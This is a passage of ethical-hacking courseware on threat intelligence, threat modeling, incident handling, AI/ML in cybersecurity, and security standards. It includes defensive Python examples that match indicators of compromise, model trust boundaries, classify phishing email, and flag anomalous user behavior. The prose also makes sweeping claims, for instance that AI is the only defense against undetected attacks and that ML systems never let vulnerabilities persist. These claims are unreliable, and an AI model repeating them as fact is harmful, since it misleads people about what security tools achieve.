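Technical threat intelligence is only useful once the indicators are matched against what the organization actually sees. The following is an added example (not code from the book or from EC-Council) of the matching step: it parses a small indicator feed of the kinds listed above (IP addresses, a network range, a domain, a malware hash, and a phishing sender) and scans key=value log events from a proxy, DNS, EDR, and mail gateway for hits. The feed, the log lines, the log format, and the campaign labels are all constructed for the example; the addresses use documentation ranges and the reserved .example TLD.

```python
"""Match technical threat intelligence (IoCs) against log lines.

Added example. Indicator types handled: IP, CIDR, domain (including
subdomains), SHA-256 hash, and phishing sender address. Each hit carries the
campaign label so an analyst can pivot from the alert back to the intelligence.
"""
import ipaddress
import re

# Constructed indicator feed (sample data; documentation IP ranges and the
# reserved .example TLD; not a real feed).
IOC_FEED = """\
# type,value,campaign
ip,198.51.100.23,c2-campaign-A
cidr,203.0.113.0/24,bulletproof-hoster
domain,update-check.example,c2-campaign-A
sha256,e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855,dropper-xyz
email_from,billing@paypa1-secure.example,phish-kit-7
"""

# Constructed log events in key=value form (proxy, DNS, EDR, mail gateway).
SAMPLE_LOGS = """\
2024-05-01T10:00:01Z type=proxy src=10.0.0.5 dst=198.51.100.23 host=cdn.example
2024-05-01T10:00:02Z type=proxy src=10.0.0.6 dst=192.0.2.44 host=intranet.example
2024-05-01T10:00:03Z type=dns client=10.0.0.7 query=api.update-check.example
2024-05-01T10:00:04Z type=dns client=10.0.0.7 query=update-check.example.lookalike.test
2024-05-01T10:00:05Z type=edr host=ws12 sha256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
2024-05-01T10:00:06Z type=mail from=billing@paypa1-secure.example to=cfo@corp.example
2024-05-01T10:00:07Z type=proxy src=10.0.0.9 dst=203.0.113.77 host=files.example
"""

KV_RE = re.compile(r"(\w+)=(\S+)")


def load_feed(text):
    """Parse the CSV feed into typed indicator tables; values are normalized."""
    ind = {"ip": {}, "cidr": [], "domain": {}, "sha256": {}, "email_from": {}}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        kind, value, campaign = line.split(",", 2)
        if kind == "cidr":
            ind["cidr"].append((ipaddress.ip_network(value), campaign))
        else:
            ind[kind][value.lower()] = campaign
    return ind


def domain_hits(name, domains):
    """A domain indicator matches itself and any subdomain (suffix match on a
    label boundary), but not a look-alike that merely contains the string."""
    name = name.lower().rstrip(".")
    return [(d, c) for d, c in domains.items() if name == d or name.endswith("." + d)]


def ip_hits(addr, ind):
    """Exact IP indicators plus membership in any listed network range."""
    hits = []
    if addr in ind["ip"]:
        hits.append((addr, ind["ip"][addr]))
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return hits
    hits += [(str(net), c) for net, c in ind["cidr"] if ip in net]
    return hits


def match_line(line, ind):
    """Return (field, indicator, campaign) for every IoC found in one event."""
    fields = dict(KV_RE.findall(line))
    hits = []
    for key in ("dst", "src"):
        if key in fields:
            hits += [(key, i, c) for i, c in ip_hits(fields[key], ind)]
    for key in ("query", "host"):
        if key in fields:
            hits += [(key, i, c) for i, c in domain_hits(fields[key], ind["domain"])]
    digest = fields.get("sha256", "").lower()
    if digest in ind["sha256"]:
        hits.append(("sha256", digest, ind["sha256"][digest]))
    sender = fields.get("from", "").lower()
    if sender in ind["email_from"]:
        hits.append(("from", sender, ind["email_from"][sender]))
    return hits


def scan(log_text, feed_text=IOC_FEED):
    """Scan every line; return (timestamp, campaign, field, indicator) alerts."""
    ind = load_feed(feed_text)
    alerts = []
    for line in log_text.splitlines():
        ts = line.split(" ", 1)[0]
        for field, indicator, campaign in match_line(line, ind):
            alerts.append((ts, campaign, field, indicator))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOGS):
        print(alert)
```

Note the two deliberate edge cases: the hash is compared case-insensitively because EDR products differ in how they print digests, and the domain match is anchored on a label boundary so that `update-check.example.lookalike.test` does not fire on the `update-check.example` indicator.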

Threat Modeling

Threat modeling is a risk assessment approach for analyzing the security of an application by capturing, organizing, and analyzing all the information that affects it. The threat model consists of three major building blocks: understanding the adversary's perspective, characterizing the security of the system, and determining threats. Every application should have a developed and documented threat model that should be revisited as the application evolves and development progresses.

Threat modeling helps to:

- Identify relevant threats to a particular application scenario
- Identify key vulnerabilities in an application's design
- Improve security design

When using this approach, an administrator should keep the following in mind:

- Try not to be rigid about specific steps or implementations; instead, focus on the approach. If any step becomes impassable, go right to step 4 of the threat modeling process and identify the problem.
- Use scenarios to scope the modeling activity.
- Use existing design documents. Use items like documented use cases or user stories, architectural diagrams, data flow diagrams, or other design documentation.
- Start with a whiteboard before capturing information in documents or getting lost in details. It may be helpful to use a digital camera with printing capabilities to document and distribute the information from the whiteboard.
- Use an iterative approach. Add more details and improve the threat model as design and development continue. This will help with becoming familiar with the modeling process and developing the threat model to better examine more possible scenarios.
- Obtain input about the host and network constraints from the system and network administrators. To better understand the end-to-end deployment diagram, obtain as much information as possible about host configurations, firewall policies, allowed protocols and ports, and other relevant details.
The threat modeling process involves five steps:

1. Identify Security Objectives

Security objectives are the goals and constraints related to the application's confidentiality, integrity, and availability. Security-specific objectives guide the threat modeling efforts and help to determine how much effort needs to be put toward subsequent steps. To identify security objectives, administrators should ask the following questions:

- What data should be protected?
- Are there any compliance requirements?
- Are there specific quality-of-service requirements?
- Are there intangible assets to protect?

2. Application Overview

Identify the components, data flows, and trust boundaries. To draw the end-to-end deployment scenario, the administrator should use a whiteboard. First, they should draw a rough diagram that explains the workings and structure of the application, its subsystems, and its deployment characteristics. The deployment diagram should contain the following:

- End-to-end deployment topology
- Logical layers
- Key components
- Key services
- Communication ports and protocols
- Identities
- External dependencies

Identify Roles

The administrator should identify people and the roles and actions they can perform within the application. For example, are there higher-privileged groups of users? Who can read data? Who can update data? Who can delete data?

Identify Key Usage Scenarios

The administrator should use the application's use cases to determine its objective. Use cases explain how the application is used and misused.

Identify Technologies

The administrator should list the technologies and key features of the software, as well as the following technologies in use:

- Operating systems
- Web server software
- Database server software
- Technologies for presentation, business, and data access layers
- Development languages

Identifying these technologies helps to focus on technology-specific threats.

Identify Application Security Mechanisms

The administrator should identify some key points regarding the following:

- Input and data validation
- Authorization and authentication
- Sensitive data
- Configuration management
- Session management
- Parameter manipulation
- Cryptography
- Exception management
- Auditing and logging
These efforts aim to identify relevant details and to add details where required, or to identify areas that require more.

3. Decompose the Application

In this step, the administrator breaks down the application to identify the trust boundaries, data flows, entry points, and exit points. Doing so makes it considerably easier to find more relevant and more detailed threats and vulnerabilities.

Identify Trust Boundaries

Identifying the application's trust boundaries helps the administrator to focus on the relevant areas of the application. It indicates where trust levels change.

- Identify outer system boundaries
- Identify access control points or key places where access requires extra privileges or role membership
- Identify trust boundaries from a data flow perspective

Identify Data Flows

The administrator should list the application's data input from entry to exit. This helps to understand how the application communicates with outside systems and clients and how the internal components interact. They should pay particular attention to the data flow across trust boundaries and the data validation at the trust boundary entry point. A good approach is to start at the highest level and then deconstruct the application by testing the data flow between different subsystems.

Identify Entry Points

The application's entry point can also serve as an entry point for attacks. All users interact with the application at these entry points. Other internal entry points uncovered by subcomponents over the layers of the application may be present only to support internal communication with other components. The administrator should identify these entry points to determine the methods used by an intruder to get in through them. They should focus on the entry points that allow access to critical functionalities and provide adequate defense for them.

Identify Exit Points

The administrator should also identify the points where the application transfers data to the client or external systems. They should prioritize the exit points at which the application writes data containing client input or data from untrusted sources, such as a shared database.

4. Identify Threats

The administrator should identify threats relevant to the control scenario and context using the information obtained in the application overview and decompose application steps. They should bring members of the development and test teams together to identify potential threats. The team should start with a list of common threats grouped by their application vulnerability category. This step uses a question-driven approach to help identify threats.

5. Identify Vulnerabilities

A vulnerability is a weakness in an application (deployed in an information system) that allows attacker exploitation, thereby leading to security breaches. Security administrators should identify any weaknesses related to the threats found using the vulnerability categories, and fix them beforehand to keep intruders away.
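Steps 3 and 4 above (decompose the application, then identify threats with a question-driven approach grouped by vulnerability category) can be captured as a small, repeatable model rather than only a whiteboard. The following is an added example (not code from the book or from EC-Council): components carry a trust level, each data flow records which security mechanisms apply to it, and the script derives trust-boundary crossings, entry points, exit points, and candidate threats under the book's category names. The sample application, its trust levels, and the yes/no questions asked of each flow are assumptions constructed for the example.

```python
"""Decompose an application into trust boundaries, data flows, entry and exit
points, then derive candidate threats per vulnerability category.

Added example (hypothetical application; not from the book).
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Component:
    name: str
    trust: int  # trust level; higher is more trusted (0 = the Internet)


@dataclass(frozen=True)
class Flow:
    src: Component
    dst: Component
    data: str
    sensitive: bool = False      # carries credentials, PII, payment data, ...
    validated: bool = False      # destination validates the input it receives
    authenticated: bool = False  # caller identity is verified at the destination
    encrypted: bool = False      # channel protects confidentiality in transit
    logged: bool = False         # the boundary crossing is audited


def crosses_boundary(f: Flow) -> bool:
    return f.src.trust != f.dst.trust


def entry_points(flows):
    """Flows where data enters a more trusted zone."""
    return [f for f in flows if f.src.trust < f.dst.trust]


def exit_points(flows):
    """Flows where data leaves to a less trusted zone (e.g. a shared DB)."""
    return [f for f in flows if f.src.trust > f.dst.trust]


def threats_for(f: Flow):
    """Question-driven checks; each yields (category, threat description)."""
    out = []
    label = f"{f.src.name} -> {f.dst.name} ({f.data})"
    entering, leaving = f.src.trust < f.dst.trust, f.src.trust > f.dst.trust
    if entering and not f.validated:
        out.append(("Input and data validation",
                    f"untrusted data not validated at the boundary entry point: {label}"))
    if entering and not f.authenticated:
        out.append(("Authorization and authentication",
                    f"entry point reachable without prior authentication; confirm intended: {label}"))
    if f.sensitive and not f.encrypted:
        out.append(("Sensitive data", f"sensitive data in clear text between components: {label}"))
    if leaving and f.sensitive:
        out.append(("Sensitive data", f"sensitive data written to a lower-trust exit point: {label}"))
    if crosses_boundary(f) and not f.logged:
        out.append(("Auditing and logging", f"boundary crossing is not audited: {label}"))
    return out


def threat_model(flows):
    """All candidate threats, flows into the most trusted tier first."""
    ranked = sorted(flows, key=lambda f: f.dst.trust, reverse=True)
    return [(cat, t) for f in ranked for cat, t in threats_for(f)]


def summarize(flows):
    """Count of candidate threats per vulnerability category."""
    by_cat = {}
    for cat, _ in threat_model(flows):
        by_cat[cat] = by_cat.get(cat, 0) + 1
    return by_cat


# Constructed example application (assumed trust levels: 0 Internet, 1 DMZ,
# 2 internal, 3 data tier).
internet = Component("browser", 0)
web = Component("web server", 1)
app = Component("app server", 2)
db = Component("customer DB", 3)
reports = Component("shared reporting DB", 1)

FLOWS = [
    Flow(internet, web, "login form", sensitive=True, validated=True, encrypted=True, logged=True),
    Flow(web, app, "session + order request", authenticated=True, logged=True),
    Flow(app, db, "SQL with customer PII", sensitive=True, validated=True, authenticated=True),
    Flow(db, reports, "nightly export of order rows", sensitive=True, encrypted=True),
    Flow(app, app, "internal cache refresh"),  # no boundary crossed: no threats
]

if __name__ == "__main__":
    print("entry points:", [f.data for f in entry_points(FLOWS)])
    print("exit points: ", [f.data for f in exit_points(FLOWS)])
    for cat, threat in threat_model(FLOWS):
        print(f"[{cat}] {threat}")
    print(summarize(FLOWS))
```

The ordering puts flows into the data tier at the top of the list, matching the advice to focus on entry points that reach critical functionality; the flow that never crosses a boundary produces nothing, which is the filtering benefit of decomposing before brainstorming.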

Incident Management

Incident management is a set of defined processes to identify, analyze, prioritize, and resolve security incidents to restore the system to normal service operations as soon as possible, and prevent recurrence of the incident. It involves not only responding to incidents but also triggering alerts to prevent potential risks and threats. A security administrator must identify software that is open to attacks before someone takes advantage of the vulnerabilities.

Incident management includes the following:

- Vulnerability analysis
- Artifact analysis
- Security awareness training
- Intrusion detection
- Public or technology monitoring

The incident management process is designed to:

- Improve service quality
- Resolve problems proactively
- Reduce the impact of incidents on an organization or its business
- Meet service availability requirements
- Increase staff efficiency and productivity
- Improve user and customer satisfaction
- Assist in handling future incidents
Conducting training sessions to spread awareness among users is an important part of incident management. Such sessions help end-users to recognize suspicious events or incidents easily and report an attacker's behavior to the appropriate authority. The following people perform incident management activities:

- Human resources personnel take steps to fire employees suspected of harmful computer activities.
- The legal counsel sets the rules and regulations in an organization. These rules can influence the internal security policies and practices of the organization in case an insider or an attacker uses the organization's system for harmful or malicious activities.
- The firewall manager keeps filters in place. These filters are frequently where denial-of-service attacks are made.
- An outsourced service provider repairs systems infected by viruses and malware.
Incident response is one of the functions performed in incident handling. In turn, incident handling is one of the services provided as part of incident management. The following diagram illustrates the relationship between incident response, incident handling, and incident management.

[Figure 1.4: Block Diagram of Incident Management. Blocks: Incident Management; Vulnerability Handling; Incident Handling; Artifact Handling; Announcements; Analysis]

Incident Handling and Response

Incident handling and response (IH&R) is the process of taking organized and careful steps when reacting to a security incident or cyberattack. It is a set of procedures, actions, and measures taken against an unexpected event occurrence. It involves logging, recording, and resolving incidents that take place in the organization. It notes the incident, when it occurred, its impact, and its cause. It is the practice of managing the incident response processes, such as preparation, detection, containment, eradication, and recovery, to overcome the impact of an incident quickly and efficiently. IH&R processes are important to provide a focused approach for restoring normal business operations as quickly as possible after an incident and with a minimal impact on the business.

The IH&R process involves defining user policies, developing protocols, building incident response teams, auditing organizational assets, planning incident response procedures, obtaining management approval, incident reporting, prioritization, and managing response. It also includes establishing proper communication between the individuals responding to an incident and guiding them to detect, analyze, contain, recover, and prevent incidents.

Discussed below are the steps involved in the IH&R process:

Step 1: Preparation

The preparation phase includes performing an audit of resources and assets to determine the purpose of security and define the rules, policies, and procedures that drive the IH&R process. It also includes building and training an incident response team, defining incident readiness procedures, and gathering required tools as well as training the employees to secure their systems and accounts.

Step 2: Incident Recording and Assignment

In this phase, the initial reporting and recording of the incident take place. This phase handles identifying an incident and defining proper incident communication plans for the employees and also includes communication methods that involve informing IT support personnel or submitting an appropriate ticket.

Step 3: Incident Triage

In this phase, the identified security incidents are analyzed, validated, categorized, and prioritized. The IH&R team further analyzes the compromised device to find incident details such as the type of attack, its severity, target, impact, and method of propagation, and any vulnerabilities it exploited.

Step 4: Notification

In the notification phase, the IH&R team informs various stakeholders, including management, third-party vendors, and clients, about the identified incident.

Step 5: Containment

This phase helps to prevent the spread of infection to other organizational assets, preventing additional damage.

Step 6: Evidence Gathering and Forensic Analysis

In this phase, the IH&R team accumulates all possible evidence related to the incident and submits it to the forensic department for investigation. Forensic analysis of an incident reveals details such as the method of attack, vulnerabilities exploited, security mechanisms averted, network devices infected, and applications compromised.

Step 7: Eradication

In the eradication phase, the IH&R team removes or eliminates the root cause of the incident and closes all the attack vectors to prevent similar incidents in the future.

Step 8: Recovery

After eliminating the causes for the incidents, the IH&R team restores the affected systems, services, resources, and data through recovery. It is the responsibility of the incident response team to ensure that the incident causes no disruption to the services or business of the organization.

Step 9: Post-Incident Activities

Once the process is complete, the security incident requires additional review and analysis before closing the matter. Conducting a final review is an important step in the IH&R process that includes:

- Incident documentation
- Incident impact assessment
- Reviewing and revising policies
- Closing the investigation
- Incident disclosure

Role of AI and ML in Cyber Security

Machine learning (ML) and Artificial Intelligence (AI) are now popularly used across various industries and applications due to the increase in computing power, data collection, and storage capabilities. Along with technological advancements in AI, such as self-driving cars, language translators, and big data, there is also a rise in threats such as ransomware, botnets, malware, and phishing. Using AI and ML in cybersecurity helps to identify new exploits and weaknesses, which can be easily analyzed to mitigate further attacks. It reduces the pressure on security professionals and alerts them whenever an action is needed.

What are AI and ML?

Artificial intelligence is the only solution to defend networks against the various attacks that an antivirus scan cannot detect. A huge amount of collected data is fed into the AI, which processes and analyzes it to understand its details and trends. ML is a branch of artificial intelligence (AI) that gives the systems the ability to self-learn without any explicit programs. This self-learning system is used to define what the normal network, along with its devices, looks like, and then uses this to backtrack and report any deviations or anomalies in real-time.
There are two types of ML classification techniques:

- Supervised Learning

  Supervised learning uses algorithms that input a set of labeled training data to attempt to learn the differences between the given labels. Supervised learning is further divided into two subcategories, namely, classification and regression. Classification includes completely divided classes. Its main task is to define the test sample to identify its class. Regression is used when data classes are not separated, such as when the data is continuous.

- Unsupervised Learning

  Unsupervised learning makes use of algorithms that input unlabeled training data to attempt to deduce all the categories without guidance. Unsupervised learning is further divided into two subcategories, namely, clustering and dimensionality reduction. Clustering divides the data into clusters based on their similarities, regardless of class information. Dimensionality reduction is the process of reducing the dimensions (attributes) of data.

Why AI and ML?
Source: https://www.gartner.com, https://www.marketsandmarkets.com

The security threat landscape continues to evolve not just in scale but, more importantly, in sophistication. Despite a range of advancements in the industry to safeguard against increasingly bold and intricate threats, organizations have struggled to keep pace with the technologies and techniques employed by attackers. As companies continue to increase their digital footprints, "identify and diagnose" capabilities are not enough to remediate against this growing fundamental business challenge for organizations of all shapes and sizes. The development of advanced security analytics is an important consideration for organizations looking to implement machine learning to defend against an array of internal and external security threats.

The cyber security market is set to exceed $300 billion by 2024, and the AI-related cyber security market is predicted to reach a value of $38.2 billion by 2026.

[Figure: AI in Cyber Security Market, by Region (USD Billion)]

AI and ML Application Areas

Source: https://www.cbinsights.com

According to CB Insights, alongside overall rising investment activity, many cybersecurity companies are emerging to offer novel solutions to cyber threats by leveraging the advantages of artificial intelligence (AI). According to CB Insights' AI Deals Tracker, cybersecurity is the fourth most active industry for deals to companies applying AI. As per CB Insights' data, there are over 80 private cybersecurity companies that are using AI, categorized into the nine main areas in which they operate:

- Anti-fraud and identity management
- Cyber-risk management
- Mobile security
- Predictive intelligence
- App security
- IoT security
- Behavioral analytics and anomaly detection
- Deception security
- Automated security
[Figure: Cybersecurity's Next Step Market Map: 80+ Companies Securing the Future with Artificial Intelligence (source: CB Insights). Legible panels: Anti-Fraud & Identity Management, Mobile Security, Predictive Intelligence, Automated Security, Cyber-Risk Management, Deception Security]
How Do AI and ML Prevent Cyber Attacks?

Artificial Intelligence (AI), and with it, Machine Learning (ML), is an emerging technology in the field of cybersecurity. It is widely adopted by large-scale industries such as automation, IT services, manufacturing, production, and finance. AI plays a crucial role in detecting imminent cyber threats by incorporating machine learning as a subset.

Following are different ways that AI and ML safeguard industries from cybersecurity attacks:

- Password Protection and Authentication

  Password credentials play a critical role in preventing illegitimate access to the organization's or user's data. If credentials are compromised, the reputation of the organization or person could be damaged. Sometimes, traditional face detection and other biometric security measures can also be vulnerable to these credential breaches. Programmers use AI to improve biometric validations and face recognition to thwart such attacks. AI provides the latest models for recognizing an individual's face by tracking key correlations and patterns.

- Phishing Detection and Prevention

  Phishing is a common method attackers employ to send their payloads via emails. The majority of users cannot figure out which received emails have a malicious attachment or payload. In this case, AI and ML could play a pivotal role in identifying and preventing such phishing attacks. They can scan and identify phishing emails much faster than a human being can. They can also quickly differentiate malicious websites from legitimate websites.
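As an added example (not the courseware's own code) of the supervised classification described under Supervised Learning, applied to the phishing detection use case above, the following Python script trains a multinomial naive Bayes classifier from scratch on a small, constructed set of labelled messages and then classifies unseen mail; the training messages and the two class labels are assumptions made for illustration.

```python
"""Supervised classification for phishing detection: a multinomial naive
Bayes classifier written from scratch (standard library only).

Added example, not code from the CEH courseware. The training messages
below are constructed for illustration; a real deployment would train on
a labelled corpus of the organisation's own mail.
"""
import math
import re
from collections import Counter, defaultdict

# Constructed, labelled training data: (message text, label).
TRAINING_DATA = [
    ("urgent: verify your account password now or it will be suspended", "phishing"),
    ("your mailbox is full, click here to login and confirm your password", "phishing"),
    ("security alert: unusual sign-in, confirm your identity at this link", "phishing"),
    ("invoice attached, open the attachment to claim your refund today", "phishing"),
    ("your account has been locked, click the link to verify immediately", "phishing"),
    ("team meeting moved to 3pm tomorrow, agenda attached", "legitimate"),
    ("quarterly report draft is ready for review, comments welcome", "legitimate"),
    ("lunch on friday? the new place downtown has good reviews", "legitimate"),
    ("reminder: submit your timesheet by end of day thursday", "legitimate"),
    ("thanks for the feedback on the design document, updated version attached", "legitimate"),
]

TOKEN_RE = re.compile(r"[a-z0-9]+")


def tokenize(text):
    """Lower-case a message and split it into alphanumeric tokens."""
    return TOKEN_RE.findall(text.lower())


class NaiveBayesClassifier:
    """Multinomial naive Bayes with Laplace (add-one) smoothing."""

    def __init__(self, alpha=1.0):
        self.alpha = alpha
        self.class_counts = Counter()            # messages seen per label
        self.word_counts = defaultdict(Counter)  # label -> token counts
        self.vocab = set()

    def fit(self, samples):
        """Learn token frequencies per label from labelled samples."""
        for text, label in samples:
            self.class_counts[label] += 1
            for token in tokenize(text):
                self.word_counts[label][token] += 1
                self.vocab.add(token)
        return self

    def log_posteriors(self, text):
        """Return {label: unnormalised log P(label | text)}."""
        tokens = tokenize(text)
        total_docs = sum(self.class_counts.values())
        scores = {}
        for label, n_docs in self.class_counts.items():
            score = math.log(n_docs / total_docs)  # log prior
            total_tokens = sum(self.word_counts[label].values())
            denom = total_tokens + self.alpha * len(self.vocab)
            for token in tokens:
                # Unseen tokens fall back to the smoothed count alpha, so a
                # single new word never zeroes out a class.
                count = self.word_counts[label].get(token, 0)
                score += math.log((count + self.alpha) / denom)
            scores[label] = score
        return scores

    def predict(self, text):
        """Return the label with the highest posterior for the message."""
        scores = self.log_posteriors(text)
        return max(scores, key=scores.get)


def build_phishing_classifier():
    """Train the classifier on the constructed corpus above."""
    return NaiveBayesClassifier().fit(TRAINING_DATA)


def classify(text, clf=None):
    """Classify one message as 'phishing' or 'legitimate'."""
    clf = clf or build_phishing_classifier()
    return clf.predict(text)


if __name__ == "__main__":
    model = build_phishing_classifier()
    for msg in [
        "please verify your password by clicking this link, your account will be suspended",
        "can you send me the updated agenda for tomorrow's meeting?",
    ]:
        print(f"{model.predict(msg):10s} <- {msg}")
```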

- Threat Detection

  Machine learning assists companies in detecting cyber-attacks before systems are compromised. Being a part of AI, machine learning constantly keeps admins notified of imminent cyber threats by carrying out logical data analysis. ML allows systems to run its algorithms upon the data being received, then performs deep learning on the data and comprehends the advancements required to ensure the safety of the information systems.

- Vulnerability Management

  AI and ML-based systems never allow vulnerability to exist for long; they dynamically scan for all types of vulnerabilities and alert the admins before the system is exploited. They can also provide the attacker's information and the patterns used to perform the attack. These AI- and ML-based systems can also forecast how and when a vulnerability exploitation might occur.

- Behavioral Analytics

  Another notable security improvement by artificial intelligence is "Behavioral Analytics." Attackers who have stolen the credentials of a legitimate user can perform malicious activities on the organization's network; such attempts are difficult to detect and thwart. Here, AI with ML generates specific user patterns based on their regular usage. AI software instantly alerts the admin if it detects any suspicious activity or deviation in regular usage.
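As an added example (not the courseware's own code) of the behavioral analytics described above, the following Python script builds an unsupervised per-user baseline from constructed activity-log lines and scores new events for deviations from that baseline (unusual transfer size, host, source address or hour); the log format, user names and thresholds are assumptions made for illustration.

```python
"""Behavioral analytics: an unsupervised per-user baseline that flags
deviations from a user's normal activity (standard library only).

Added example, not code from the CEH courseware. Log lines, users and
thresholds are constructed for illustration.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime, timezone

# Assumed log format: "<ISO timestamp> user=<u> src=<ip> host=<h> bytes=<n>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) src=(?P<src>\S+) "
    r"host=(?P<host>\S+) bytes=(?P<bytes>\d+)$"
)

# Constructed baseline of normal activity (working hours, familiar hosts).
BASELINE_LOG = """\
2024-05-06T09:02:11Z user=alice src=10.0.0.5 host=wiki bytes=1400
2024-05-06T10:15:40Z user=alice src=10.0.0.5 host=mail bytes=2100
2024-05-06T14:30:02Z user=alice src=10.0.0.5 host=wiki bytes=1700
2024-05-07T09:10:55Z user=alice src=10.0.0.5 host=mail bytes=1900
2024-05-07T16:45:19Z user=alice src=10.0.0.5 host=wiki bytes=1500
2024-05-06T08:55:00Z user=bob src=10.0.0.9 host=git bytes=52000
2024-05-06T11:20:31Z user=bob src=10.0.0.9 host=git bytes=61000
2024-05-07T09:48:12Z user=bob src=10.0.0.9 host=ci bytes=58000
2024-05-07T15:05:47Z user=bob src=10.0.0.9 host=git bytes=49000
"""

# Constructed new events: one of alice's is a classic stolen-credential
# pattern (off-hours, new source, new host, large transfer).
NEW_LOG = """\
2024-05-08T10:05:23Z user=alice src=10.0.0.5 host=wiki bytes=1600
2024-05-08T02:17:09Z user=alice src=203.0.113.7 host=fileserver bytes=48000
2024-05-08T11:40:51Z user=bob src=10.0.0.9 host=git bytes=55000
"""


def parse_line(line):
    """Parse one log line into a dict; reject lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised log line: {line!r}")
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"ts": ts, "user": m["user"], "src": m["src"],
            "host": m["host"], "bytes": int(m["bytes"])}


def build_baselines(log_text):
    """Learn each user's normal pattern from unlabeled events (unsupervised)."""
    per_user = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            ev = parse_line(line)
            per_user[ev["user"]].append(ev)
    baselines = {}
    for user, events in per_user.items():
        sizes = [e["bytes"] for e in events]
        baselines[user] = {
            "mean_bytes": statistics.mean(sizes),
            # Floor the deviation at 1 byte so a constant baseline cannot
            # produce a division by zero in the z-score.
            "std_bytes": max(statistics.pstdev(sizes), 1.0),
            "hosts": {e["host"] for e in events},
            "sources": {e["src"] for e in events},
            "hours": {e["ts"].hour for e in events},
        }
    return baselines


def score_event(event, baselines):
    """Return (score, reasons); every deviation from the baseline adds points."""
    base = baselines.get(event["user"])
    if base is None:
        return 3, ["no baseline for user"]
    score, reasons = 0, []
    z = (event["bytes"] - base["mean_bytes"]) / base["std_bytes"]
    if z > 3:
        score += 2
        reasons.append(f"transfer size z-score {z:.1f}")
    if event["host"] not in base["hosts"]:
        score += 1
        reasons.append(f"new host {event['host']}")
    if event["src"] not in base["sources"]:
        score += 1
        reasons.append(f"new source {event['src']}")
    if event["ts"].hour not in base["hours"]:
        score += 1
        reasons.append(f"unusual hour {event['ts'].hour:02d}:00")
    return score, reasons


def detect_anomalies(log_text, baselines, threshold=2):
    """Return (user, timestamp, score, reasons) for events reaching the threshold."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        score, reasons = score_event(ev, baselines)
        if score >= threshold:
            alerts.append((ev["user"], ev["ts"].isoformat(), score, reasons))
    return alerts


if __name__ == "__main__":
    for alert in detect_anomalies(NEW_LOG, build_baselines(BASELINE_LOG)):
        print(alert)
```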

- Network Security

  Two significant factors of network security are generating comprehensive security policies and mapping an enterprise's network topology. Unfortunately, both of these factors are time-consuming. Therefore, administrators are adopting AI to enhance this operation; it can carry out the network traffic analysis and propose efficient security policies by default.

- AI-based Antivirus

  Traditional antivirus tools perform file scanning on the organization's networks to check if any signatures match those of known viruses or malware. The issue with this is that antivirus tools must be updated when the user wants to scan for new malware or viruses. Updating is time-consuming, and new deployment often takes a certain amount of time. To overcome these issues, organizations employ AI-based antiviruses, which use anomaly detection to understand programs' behavior. AI-based antivirus detects suspicious program behavior instead of matching signatures for viruses.

- Fraud Detection

  AI and ML algorithms carry out anomaly detection to identify payment inconsistencies and fraudulent transactions. They also perform automated pattern discovery across different transactions. ML can easily differentiate between authentic and illegitimate transactions and blocks fraudulent transactions.

- Botnet Detection

  Botnets can bypass the Intrusion Detection System (IDS) by leveraging its ineffectiveness in matching signatures. Botnets can be embedded using a highly sophisticated code that makes them untraceable by traditional IDS implementations. Hence, security professionals use AI and ML algorithms that alert about the suspicious behavior of a network and detect unauthorized intrusions.

- AI to Combat AI Threats

  Attackers can also leverage AI technology to make their way into an organization's network; such cyber threats must be detected immediately. AI software can detect such imminent AI-augmented attacks before the network is compromised.

Information Security Laws and Standards

Laws are a system of rules and guidelines that are enforced by a particular country or community to govern behavior. A Standard is a "document established by consensus and approved by a recognized body that provides, for common and repeated use, rules, guidelines, or characteristics for activities or their results, aimed at the achievement of the optimum degree of order in a given context." This section deals with the various laws and standards dealing with information security in different countries.

Payment Card Industry Data Security Standard (PCI DSS)
Source: https://www.pcisecuritystandards.org

The Payment Card Industry Data Security Standard (PCI DSS) is a proprietary information security standard for organizations that handle cardholder information for the major debit, credit, prepaid, e-purse, ATM, and POS cards. This standard offers robust and comprehensive standards and supporting materials to enhance payment card data security. These materials include a framework of specifications, tools, measurements, and support resources to help organizations ensure the safe handling of cardholder information. PCI DSS applies to all entities involved in payment card processing, including merchants, processors, acquirers, issuers, and service providers, as well as all other entities that store, process or transmit cardholder data. PCI DSS comprises a minimum set of requirements for protecting cardholder data. The Payment Card Industry (PCI) Security Standards Council has developed and maintains a high-level overview of PCI DSS requirements.

Table 1.3: Table showing the PCI Data Security Standard — High Level Overview

Failure to meet PCI DSS requirements may result in fines or the termination of payment-card processing privileges.

ISO/IEC 27001:2013

Source: https://www.iso.org

ISO/IEC 27001:2013 specifies the requirements for establishing, implementing, maintaining, and continually improving an information security management system within the context of an organization. It includes requirements for the assessment and treatment of information security risks tailored to the needs of the organization. The regulation is intended to be suitable for several different uses, including:

- Use within organizations to formulate security requirements and objectives
- Use within organizations as a way to ensure that security risks are cost-effectively managed
- Use within organizations to ensure compliance with laws and regulations
- Defining new information security management processes
- Identifying and clarifying existing information security management processes
- Use by the management of organizations to determine the status of information security management activities
- Implementing business-enabling information security
- Use by organizations to provide relevant information about information security to customers

Health Insurance Portability and Accountability Act (HIPAA)

Source: https://www.hhs.gov

The HIPAA Privacy Rule provides federal protections for the individually identifiable health information held by covered entities and their business associates and gives patients an array of rights to that information. At the same time, the Privacy Rule permits the disclosure of health information needed for patient care and other necessary purposes. The Security Rule specifies a series of administrative, physical, and technical safeguards for covered entities and their business associates to use to ensure the confidentiality, integrity, and availability of electronically protected health information. The Office of Civil Rights implemented HIPAA's Administrative Simplification Statute and Rules, as discussed below:
- Electronic Transactions and Code Set Standards

